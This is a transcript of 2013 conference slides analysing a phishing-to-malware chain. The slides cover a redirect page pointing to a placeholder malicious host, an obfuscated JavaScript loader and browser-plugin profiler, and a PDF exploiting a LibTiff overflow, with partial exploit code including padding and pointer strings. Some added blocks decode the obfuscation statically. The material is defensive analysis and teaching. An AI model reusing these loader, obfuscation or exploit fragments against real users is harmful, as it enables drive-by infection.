Analysing Phishing & Malware Attacks for Neither Fun nor Profit
 


Slides to accompany my talk given to TASK.to on 25th Sept 2013.


I discuss tracking an attempted

Usage Rights

CC Attribution-NonCommercial License


Presentation Transcript

  • Analyzing Phishing & Malware Attacks For Neither Fun Nor Profit. Lee Brotherston, @leEb_public
  • Obligatory “where I work” slide
  • Introduction • What is meant by Malware & Phishing? • Responding with Malware & Phishing? • Case study + bonus tangents • Questions
  • Malware Response Steps. During: • Assess if attack was successful • Assess impact to users/network • Contain & Remediate. Afterwards: • Examine what worked • Examine what failed • Improve processes, procedures & tools
  • Anatomy of a phish
  • Tangent #1 – Stanley Milgram
  • Case Study - Email
  • Case Study – OPSEC • Virtualised Environments (are not a panacea) • No, not a real browser….. No. • wget, curl, nslookup, socat & telnet are your friends (--user-agent=“…” is also your friend)
  • Case Study - Redirection
    curl --dump-header header.txt --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/
  • Case Study - Redirection
    <html>
    <title>Redirecting to ACH details, please wait.....</title>
    <script type="text/javascript">
    <!--
    location.replace("hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php");
    //-->
    </script>
    <noscript>
    <meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php">
    </noscript>
  • Case Study – EvilMalwareSite.com
    <body><i></i><b>
    [several thousand comma-separated numbers, the encoded next stage, elided here]
    </b>
    <script>
    try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}
    </script>
  • Tangent #2 - Obfuscation
    <script>
    document.write('Hello World');
    </script>
  • Tangent #2 - Obfuscation
    <script>
    document.write('Hel'+''+'lo Wo'+''+'rld');
    </script>
  • Tangent #2 - Obfuscation
    <script>
    var naughty = "document.write('Hel'+'lo Wo'+'rld');";
    eval(naughty);
    </script>
  • Tangent #2 - Obfuscation
    <script>
    var encodedNaughty = "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
    var naughty ='';
    for (var i = 0; i < encodedNaughty.length; i += 2)
      naughty += String.fromCharCode(parseInt(encodedNaughty.substr(i, 2), 16));
    eval(naughty);
    </script>
  • Tangent #2 - Obfuscation
    <script>
    var a = "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
    var aa ='';
    for (var aaa = 0; aaa < a.length; aaa += 2)
      aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
    eval(aa);
    </script>
  • Tangent #2 - Obfuscation
    <script>
    var a = "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
    z=eval;
    var aa ='';
    for (var aaa = 0; aaa < a.length; aaa += 2)
      aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
    z(aa);
    </script>
  • Tangent #2 - Obfuscation
    <script>var a="646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+=2)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),16));z(aa);</script>
    ==
    <script>
    document.write('Hello World');
    </script>
  • Deobfuscating Example - Revelo
  • Deobfuscating GK - Revelo
  • What Happened?
  • Case Study
    <script>
    try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}
    </script>
    <script>
    z=eval;ss=String;function vq(){for(i=0;i<a.length;i++){if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){dd=document;try{dd.body-=12}catch(xq){a=dd[gg]("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}
    </script>
    <script>
    s="";
    zzz();
    az=1;try{caewbtew=~2;}catch(vava){az=0;}
    vq();
    u=z;uu=s;
    if(az)u(uu);
    </script>
  • Case Study
    <script>
    try {
      document.body--
    } catch (dv32r3) {
      a = document[("getEl" + "ementsByTagName")]("b")[0].innerHTML["split"](",");
      for (j = 0; a["length"] > j; j++) {
        a[j] = 1 + 0x1 * a[j];
      }
      ff = "f";
      a = String[ff + "romCharCode"].apply(String, a);
      d = document.createElement("span");
      document["body"].appendChild(d);
      d["innerHTML"] = a;
    }
    z = eval;
    ss = String;
    function vq() {
    . . . . . . . . .
  • Case Study – Quick & Dirty Deobfuscate…
    z = eval;
    u = z;
    if (az) u(uu);
    u = eval   uu = decoded script
    if(az) document.write('<code>'+uu+'</code>');
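The Tangent #2 hex loop and the two case-study stages above, decoded statically as an added example (this is not code from the talk; instead of the slide's eval-to-document.write swap it decodes the data without ever executing the sample). The hex string is the slides' own encodedNaughty value; the two-stage page and its 'Hello World' payload are constructed for the demo.

```javascript
"use strict";
// Added example, not code from the talk: static decoders for the schemes
// walked through above, so the hidden script is recovered without eval.
// HEX_FROM_SLIDES is the slides' encodedNaughty value; SAMPLE_PAGE is a
// constructed stand-in for the case-study page, with "Hello World" as payload.

// Tangent #2: two hex digits per character, then eval().
function decodeHexPairs(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-f]/i.test(hex)) {
    throw new Error("not a string of hex pairs");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Case study, stage 1: the <b> element holds comma-separated numbers, each
// one below the real char code (the loader does a[j] = 1 + 0x1 * a[j]).
function decodeCommaCodes(text) {
  return text.split(",").map(function (n) {
    const code = 1 + Number(n);
    if (!Number.isInteger(code) || code < 0) throw new Error("bad code: " + n);
    return String.fromCharCode(code);
  }).join("");
}

// Case study, stage 2: the stage-1 HTML carries a <div> of dot-separated hex
// values; the loader computes fromCharCode((-35-2) + eval("0x" + value)).
function decodeDottedHex(text) {
  return text.split(".").map(function (h) {
    if (!/^[0-9a-f]+$/i.test(h)) throw new Error("bad hex: " + h);
    return String.fromCharCode(parseInt(h, 16) - 37);
  }).join("");
}

// Body of the first <tag>...</tag> in a fragment, regex only: no DOM, and
// nothing in the sample ever runs. The tag name must end at whitespace or
// '>', so asking for "b" does not match <body>.
function firstTagBody(html, tag) {
  const re = new RegExp("<" + tag + "(?:\\s[^>]*)?>([\\s\\S]*?)</" + tag + ">", "i");
  const m = re.exec(html);
  return m ? m[1] : null;
}

// Both case-study stages: <b> numbers -> HTML with a <div> -> final script.
function unwrapCaseStudy(pageHtml) {
  const bBody = firstTagBody(pageHtml, "b");
  if (bBody === null) throw new Error("no <b> element in page");
  const stage1 = decodeCommaCodes(bBody);
  const divBody = firstTagBody(stage1, "div");
  if (divBody === null) throw new Error("no <div> element in stage 1");
  return { stage1Html: stage1, script: decodeDottedHex(divBody) };
}

// Encoders exist only to build the constructed sample the decoders invert.
function encodeCommaCodes(s) {
  return Array.from(s, function (c) { return String(c.charCodeAt(0) - 1); }).join(",");
}
function encodeDottedHex(s) {
  return Array.from(s, function (c) { return (c.charCodeAt(0) + 37).toString(16); }).join(".");
}

const HEX_FROM_SLIDES =
  "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
const INNER_SCRIPT = "document.write('Hello World');"; // constructed payload
const SAMPLE_PAGE = "<body><i></i><b>" +
  encodeCommaCodes("<div>" + encodeDottedHex(INNER_SCRIPT) + "</div>") +
  "</b><script>/* loader omitted */</script></body>";

console.log(decodeHexPairs(HEX_FROM_SLIDES));     // the Tangent #2 one-liner
console.log(unwrapCaseStudy(SAMPLE_PAGE).script); // the constructed payload
```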
  • Et Voila!
    pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return function(){c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b)
  • Edited Highlights
    flash: {
      mimeType: "application/x-shockwave-flash",
      progID: "ShockwaveFlash.ShockwaveFlash",
      classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
      getVersion: function () {
    adobereader: {
      mimeType: "application/pdf",
    java: {
      mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
  • Socat - the quick (cheats) way
    $ socat TCP4-LISTEN:8080 -
    GET http://EVILMALWARESITE.COM/ensure/bulletin-isolate.php?jnlp=7dff3c2e22 HTTP/1.1
    accept-encoding: gzip
    Host: evilmalwaresite.com
    Cache-Control: no-cache
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Proxy-Connection: keep-alive
  • Case Study – Summary so far • Redirects • Obtains obfuscated script • De-obfuscates script • Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc) • Collects versions & configuration of the plugins • Rewrites the current page • Embeds the payload (PDF)
  • Case Study – AntiVirus
  • Case Study – Payload • VirusTotal – LibTiff Integer Overflow – PDF:Exploit.PDF-JS.AAH – PDF/Blacole-FHJ!811825B7A717 – Exploit:Win32/CVE-2010-0188
  • Case Study – Payload • Malware Tracker: – 111.0@4334: suspicious.javascript in XFA block – 111.0@4334: suspicious.warning: object contains JavaScript • Let’s extract the XFA block
  • MalwareScanner - XFA
  • XFA Block – here we go again!
    <script contentType='application/x-javascript'>
    if(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event&#46;target;}
    xs="x65";
    dd="Co"+"de";
    ddd="ar";
    s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
    xx=s[2].concat('a',"l");
  • XFA Block - Obfuscation
    s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
    String["fr"['c'+''+'o'+"nca"+s[3]]…
    String["fr"['conca'+s[3]]…
    String["fr"['concat']…
  • XFA Block – Obfuscation
    function ZZA(){return 2-2;}
    sq=z[xs+xx]
    xs="x65";                  <- Hex “e”
    xx=s[2].concat('a',"l");   <- s[2] = “v”
    sq=eval;
  • XFA Block - Obfuscation
    if(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event&#46;target;}
    ==
    if(1){x='eI';zz="y";z=event&#46;target;}
    Or
    if(0){x='eI';zz="y";z=event&#46;target;}
  • XFA Block – Just Won’t Run
    z=event&#46;target;   <- Makes IE Barf
    &#46; == .
    z=event.target;
  • XFA Block - Obfuscation
    a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011)……
    function ZA(a,b) {
      a+=b;
      sq=z[xs+xx]("x70ar"+"s"+x+s[0]+s[1]);
      return sq(a,16);
    }
  • Let’s try some guesswork
    function ZA(a,b){
      a+=b;
      document.write(String.fromCharCode(parseInt(a, 16)));
    }
    ZA(('7'),06)    Hex 76 == ‘v’
    ZA(('6'),01)    Hex 61 == ‘a’
    ZA(('7'),02)    Hex 72 == ‘r’
    ZA(('2'),00)    Hex 20 == Space
    ZA(('7'),00)    Hex 70 == ‘p’
    ZA(('6'),01)    Hex 61 == ‘a’
    ZA(('6'),04)    Hex 64 == ‘d’
    ZA(('6'),04)    Hex 64 == ‘d’
    ZA(('6'),011)   ????            <- ‘i’ == Hex 69; Octal 011 == Hex 9
    ZA(('6'),E)     Hex 6E == ‘n’
    ZA(('6'),7)     Hex 67 == ‘g’
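The guesswork above, as an added example (not code from the talk): ZA() rebuilt as a function that returns its value, plus a decoder that pulls the ZA((...),...) calls straight out of the obfuscated source text. The literal parser that turns 011 into 9 is an assumption about how a sloppy-mode engine read the script, and the slide's bare E argument is passed through as text.

```javascript
"use strict";
// Added example, not code from the talk: the XFA block's ZA() rebuilt so the
// guesswork above runs end to end, plus a decoder that reads the ZA calls
// straight out of the obfuscated source text. SLIDE_LIST is the array from
// the slide with the three trailing calls the slide shows appended.

// ZA(a, b) as the XFA script defines it: a is a one-character string and
// "a += b" concatenates, so ZA('7', 6) reads "76" as hex. The real script
// obtains parseInt at runtime via z[xs+xx]("x70ar"+"s"+x+s[0]+s[1]), i.e.
// eval("parseInt") as the slides work out; a plain parseInt is used here.
function ZA(a, b) {
  a += b;
  return parseInt(a, 16);
}

// Value of a numeric literal as a sloppy-mode engine reads it (assumption).
// The gotcha behind the slide's "????": 011 has a leading zero, so it is
// octal 9, and '6' + 9 gives "69", which is 'i', not "6011". Anything that
// is not a literal (the slide's bare E) is passed through as text.
function literalValue(text) {
  if (/^0[0-7]+$/.test(text)) return parseInt(text, 8);   // legacy octal
  if (/^[0-9]+$/.test(text)) return parseInt(text, 10);   // decimal (08, 9, 14)
  return text;                                            // not a literal
}

// Recover the string the exploit builds, one ZA call at a time.
function decodeZAList(src) {
  const call = /ZA\(\('(.)'\),([0-9A-Za-z]+)\)/g;
  let out = "";
  let m;
  while ((m = call.exec(src)) !== null) {
    out += String.fromCharCode(ZA(m[1], literalValue(m[2])));
  }
  return out;
}

const SLIDE_LIST =
  "a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00)," +
  "ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011),ZA(('6'),E),ZA(('6'),7)]";

console.log(decodeZAList(SLIDE_LIST)); // var padding
```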
  • That seemed to work! (mostly)
    var padding;
    var bbb, ccc, ddd, eee, fff, ggg, hhh;
    var pointers_a, i;
    var x = new Array();
    var y = new Array();
    var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + ".split('').reverse().join('').replace(/;/g, '');
    _l3 = app;
    _l4 = new Array();
    function _l5() {
      var _l6 = _l3.viewerVersion.toString();
      _l6 = _l6.replace('.', '');
      while (_l6.length < 4) _l6 += '0';
      return parseInt(_l6, 10)
    }
    function _l7(_l8, _l9) {
      while (_l8.length * 2 < _l9) _l8 += _l8;
      return _l8.substring(0, _l9 / 2)
    ……..
  • Exploit Code – Observations • No real obfuscation • No fake functions, variables or other distractions. • Nearly all string manipulation.
  • Exploit - Samples
    var padding;
    var pointers_a, i;
    loxWhee = _I1 + spray;
    ImageField1.rawValue = _ll1
  • Case Study – Payload • Uses a LibTiff Overflow • Executes arbitrary code, which… • Downloads and executes a .dll of the attacker's choice… Game Over
  • Tangent #3 – Game Over? Source: XKCD
  • Case Study – 2 weeks later…
  • A breach timeline. Source: Verizon 2013 Data Breach Information Report
  • Is this isolated?
  • But do people actually click? Source: Verizon 2013 Data Breach Information Report
  • The “best” Phish
  • Resources
    Socat: http://www.dest-unreach.org/socat/
    VirusTotal: http://www.virustotal.com/
    Revelo: http://www.kahusecurity.com/
    Malzilla: http://malzilla.sourceforge.net/
    curl/wget: Your local package management tool
    Malware Tracker: http://malwaretracker.com/
    Javascript Beautifier: http://jsbeautifier.org/
    Javascript Unpack: http://jsunpack.jeek.org
    DBIR: http://www.verizonenterprise.com/DBIR/2013/
  • Thank you for your time. Any Questions?